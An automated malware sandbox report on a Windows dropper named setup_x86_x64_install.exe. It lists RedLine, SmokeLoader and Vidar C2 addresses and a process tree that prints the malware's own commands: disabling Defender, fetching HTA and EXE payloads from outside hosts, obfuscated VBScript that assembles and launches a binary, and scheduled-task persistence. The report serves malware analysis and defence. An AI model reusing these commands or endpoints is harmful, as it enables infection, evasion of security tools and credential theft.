Resubmissions
01-11-2021 20:09
211101-yw5kbaafg5 1001-11-2021 07:13
211101-h2lrdsdhhj 1001-11-2021 06:40
211101-hfpk6adhfj 1031-10-2021 18:27
211031-w3r7fsdafj 1031-10-2021 14:10
211031-rgstmscghm 1031-10-2021 08:02
211031-jxchlacefm 1031-10-2021 06:36
211031-hczxqacddp 1031-10-2021 06:23
211031-g5wv4affb3 10Analysis
-
max time kernel
3383s -
max time network
27792s -
platform
windows10_x64 -
resource
win10-ja-20211014 -
submitted
01-11-2021 07:13
General
-
Target
setup_x86_x64_install.exe
-
Size
4.5MB
-
MD5
3da25ccfa9c258e3ae26854391531c7b
-
SHA1
1ed5613b0ad8ab4c47f07e52199a4edd27be40e6
-
SHA256
62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720
-
SHA512
defed576df3d8325259884b485a0dc7cd673c47028e77f189255e27dca312a0befdc8dc84106cc3103a3027e67a835fad899f9361076a64831db144354a4618c
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
srtupdate33
C2
135.181.129.119:4805
Extracted
Family
smokeloader
Version
2020
C2
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
rc4.i32
rc4.i32
Extracted
Family
vidar
Version
41.6
Botnet
933
C2
https://mas.to/@lilocc
Attributes
-
profile_id
933
Signatures
-
Formbook
Formbook is a data stealing malware which is capable of stealing data.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Modifies system executable filetype association 2 TTPs 3 IoCs
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
-
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE ClipBanker Variant Activity (POST)
suricata: ET MALWARE ClipBanker Variant Activity (POST)
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE FormBook CnC Checkin (POST) M2
suricata: ET MALWARE FormBook CnC Checkin (POST) M2
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Adds policy Run key to start application 2 TTPs 2 IoCs
-
Blocklisted process makes network request 26 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
-
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 33 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 13 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
-
Suspicious use of SetThreadContext 12 IoCs
-
Drops file in Program Files directory 22 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
-
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Kills process with taskkill 8 IoCs
-
Modifies Internet Explorer settings 1 TTPs 9 IoCs
-
Modifies data under HKEY_USERS 16 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 16 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 12 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\frbwjdaC:\Users\Admin\AppData\Roaming\frbwjda2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"2⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\frbwjdaC:\Users\Admin\AppData\Roaming\frbwjda2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Roaming\frbwjdaC:\Users\Admin\AppData\Roaming\frbwjda2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Roaming\frbwjdaC:\Users\Admin\AppData\Roaming\frbwjda2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Roaming\frbwjdaC:\Users\Admin\AppData\Roaming\frbwjda2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Roaming\frbwjdaC:\Users\Admin\AppData\Roaming\frbwjda2⤵
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8A101816\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03d477f1a31.exeSun03d477f1a31.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun033e271e0ce96c08.exeSun033e271e0ce96c08.exe /mixone6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 6607⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 6767⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 6447⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 7007⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 8927⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 9407⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 11127⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03f0dc4460bc9.exeSun03f0dc4460bc9.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03f0dc4460bc9.exeC:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03f0dc4460bc9.exe7⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03e4aeb7e43a1c.exeSun03e4aeb7e43a1c.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3069764135.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3069764135.exe"C:\Users\Admin\AppData\Local\Temp\3069764135.exe"8⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\4787631693.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\4787631693.exe"C:\Users\Admin\AppData\Local\Temp\4787631693.exe"8⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun03e4aeb7e43a1c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03e4aeb7e43a1c.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun03e4aeb7e43a1c.exe" /f8⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun0397381f1f458e.exeSun0397381f1f458e.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun0397381f1f458e.exe"C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun0397381f1f458e.exe" -u7⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun039750b00c.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun039750b00c.exeSun039750b00c.exe6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun0324aba28588c0.exeSun0324aba28588c0.exe6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun038aa349e3318e.exeSun038aa349e3318e.exe6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\yTy3pjskcaOH3SGW7DDHaAqG.exe"C:\Users\Admin\Pictures\Adobe Films\yTy3pjskcaOH3SGW7DDHaAqG.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\jw1BtrPSHkN5Ycj5GrGZrWNp.exe"C:\Users\Admin\Pictures\Adobe Films\jw1BtrPSHkN5Ycj5GrGZrWNp.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\jw1BtrPSHkN5Ycj5GrGZrWNp.exe"C:\Users\Admin\Pictures\Adobe Films\jw1BtrPSHkN5Ycj5GrGZrWNp.exe"8⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\uecNmHuKV5CntDpX5R5cAnad.exe"C:\Users\Admin\Pictures\Adobe Films\uecNmHuKV5CntDpX5R5cAnad.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\CMCX11vCmko9R4RXJMdgUVL4.exe"C:\Users\Admin\Pictures\Adobe Films\CMCX11vCmko9R4RXJMdgUVL4.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\qk9UWVrVqY4tBN2oy63GGKMe.exe"C:\Users\Admin\Pictures\Adobe Films\qk9UWVrVqY4tBN2oy63GGKMe.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\lIJoDlCIBCCNb2IhrB3rTnjY.exe"C:\Users\Admin\Pictures\Adobe Films\lIJoDlCIBCCNb2IhrB3rTnjY.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
C:\Users\Admin\Pictures\Adobe Films\UjJmg_DELP1NaVeOyjr4XbfL.exe"C:\Users\Admin\Pictures\Adobe Films\UjJmg_DELP1NaVeOyjr4XbfL.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\UjJmg_DELP1NaVeOyjr4XbfL.exe"C:\Users\Admin\Pictures\Adobe Films\UjJmg_DELP1NaVeOyjr4XbfL.exe"8⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\UzYxXqOkTtDpwSezwVXY7Exr.exe"C:\Users\Admin\Pictures\Adobe Films\UzYxXqOkTtDpwSezwVXY7Exr.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\Pictures\Adobe Films\xcLVIwmxi_ZLJsepaVLcueHv.exe"C:\Users\Admin\Pictures\Adobe Films\xcLVIwmxi_ZLJsepaVLcueHv.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im xcLVIwmxi_ZLJsepaVLcueHv.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\xcLVIwmxi_ZLJsepaVLcueHv.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im xcLVIwmxi_ZLJsepaVLcueHv.exe /f9⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1ElQX1vnC6hzc6ozl4KylRRW.exe"C:\Users\Admin\Pictures\Adobe Films\1ElQX1vnC6hzc6ozl4KylRRW.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"8⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
-
-
C:\Users\Admin\Pictures\Adobe Films\zYHzp_ecSfHCBQQQXejKOBf6.exe"C:\Users\Admin\Pictures\Adobe Films\zYHzp_ecSfHCBQQQXejKOBf6.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\zYHzp_ecSfHCBQQQXejKOBf6.exe"C:\Users\Admin\Pictures\Adobe Films\zYHzp_ecSfHCBQQQXejKOBf6.exe"8⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\d3AMh7RrYP1XgER3nYdWgVrD.exe"C:\Users\Admin\Pictures\Adobe Films\d3AMh7RrYP1XgER3nYdWgVrD.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "https://nougacoush.com/link?z=4569148" /tn "AV GORelease" /sc ONCE /st 14:8 /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ZDAes857uiA7Ldl_tt0f6Zy7.exe"C:\Users\Admin\Pictures\Adobe Films\ZDAes857uiA7Ldl_tt0f6Zy7.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\GW1qWiZN_WfRGdqvRw1o4xI2.exe"C:\Users\Admin\Pictures\Adobe Films\GW1qWiZN_WfRGdqvRw1o4xI2.exe"7⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe9⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\dYLG3PpYw0yLWxJQRvws6jif.exe"C:\Users\Admin\Pictures\Adobe Films\dYLG3PpYw0yLWxJQRvws6jif.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\PtIpbjLSQP_eHgf86mvDiq5x.exe"C:\Users\Admin\Pictures\Adobe Films\PtIpbjLSQP_eHgf86mvDiq5x.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\EN8kVF9nOEITndkmKROPnWJy.exe"C:\Users\Admin\Pictures\Adobe Films\EN8kVF9nOEITndkmKROPnWJy.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\90ZYl4DNjc4L0AZthgxTdNOd.exe"C:\Users\Admin\Pictures\Adobe Films\90ZYl4DNjc4L0AZthgxTdNOd.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\Nvh_1uHJ5edoJRrt0aUqMKjC.exe"C:\Users\Admin\Pictures\Adobe Films\Nvh_1uHJ5edoJRrt0aUqMKjC.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\Nvh_1uHJ5edoJRrt0aUqMKjC.exe"C:\Users\Admin\Pictures\Adobe Films\Nvh_1uHJ5edoJRrt0aUqMKjC.exe"8⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\BnaQE7vssOIGKiIFtluJLNOT.exe"C:\Users\Admin\Pictures\Adobe Films\BnaQE7vssOIGKiIFtluJLNOT.exe"7⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\Refutatory.exe"C:\Users\Admin\AppData\Local\Temp\Refutatory.exe"8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\tory.exe"C:\Users\Admin\AppData\Local\Temp\tory.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\Users\Admin\AppData\Local\Temp\cler.exe"C:\Users\Admin\AppData\Local\Temp\cler.exe"8⤵
- Suspicious behavior: SetClipboardViewer
-
-
-
C:\Users\Admin\Pictures\Adobe Films\H6UM5D_oAJb1wY44F0H9W53a.exe"C:\Users\Admin\Pictures\Adobe Films\H6UM5D_oAJb1wY44F0H9W53a.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" http://185.7.214.7/LOADX/m.hta8⤵
- Blocklisted process makes network request
- Checks whether UAC is enabled
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" http://185.7.214.7/LOADX/r.hta8⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\hschgIT73zIyo43yY5y_5zDy.exe"C:\Users\Admin\Pictures\Adobe Films\hschgIT73zIyo43yY5y_5zDy.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\542F.bat "C:\Users\Admin\Pictures\Adobe Films\hschgIT73zIyo43yY5y_5zDy.exe""8⤵
-
C:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""9⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904756451950616599/904756476982222878/18.exe" "18.exe" "" "" "" "" "" ""9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904756451950616599/904756503808991242/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\4795\18.exe18.exe9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\4795\Transmissibility.exeTransmissibility.exe9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\542D.tmp\542E.tmp\extd.exe "" "" "" "" "" "" "" "" ""9⤵
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\sF0PPpnmkNGtoshXjIcSBrPz.exe"C:\Users\Admin\Pictures\Adobe Films\sF0PPpnmkNGtoshXjIcSBrPz.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\sF0PPpnmkNGtoshXjIcSBrPz.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\sF0PPpnmkNGtoshXjIcSBrPz.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )8⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\sF0PPpnmkNGtoshXjIcSBrPz.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\sF0PPpnmkNGtoshXjIcSBrPz.exe" ) do taskkill -im "%~NxK" -F9⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )11⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F12⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )11⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
-
